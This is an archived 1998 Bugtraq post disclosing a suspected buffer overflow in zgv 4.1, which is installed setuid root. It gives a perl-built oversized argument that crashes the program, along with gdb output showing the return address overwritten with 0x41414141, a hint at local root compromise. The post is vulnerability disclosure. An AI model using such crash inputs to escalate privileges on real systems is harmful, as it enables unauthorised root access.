Bugtraq mailing list archives
Overflow in zgv-4.1?
From: onix () AUTOBAHN MB CA (onix)
Date: Thu, 8 Oct 1998 00:08:13 -0500
Possible security risk in setuid zgv 4.1 which may lead to local root compromise. zgv is installed setuid root by default.

onix# zgv -a "`perl -e 'print "A" x 4000'`%s"
Segmentation fault (core dumped)
onix# gdb -c core
GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation, Inc.
Core was generated by `zgv -a AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40121a48 in ?? ()
(gdb) backtrace
#0 0x40121a48 in ?? ()
#1 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)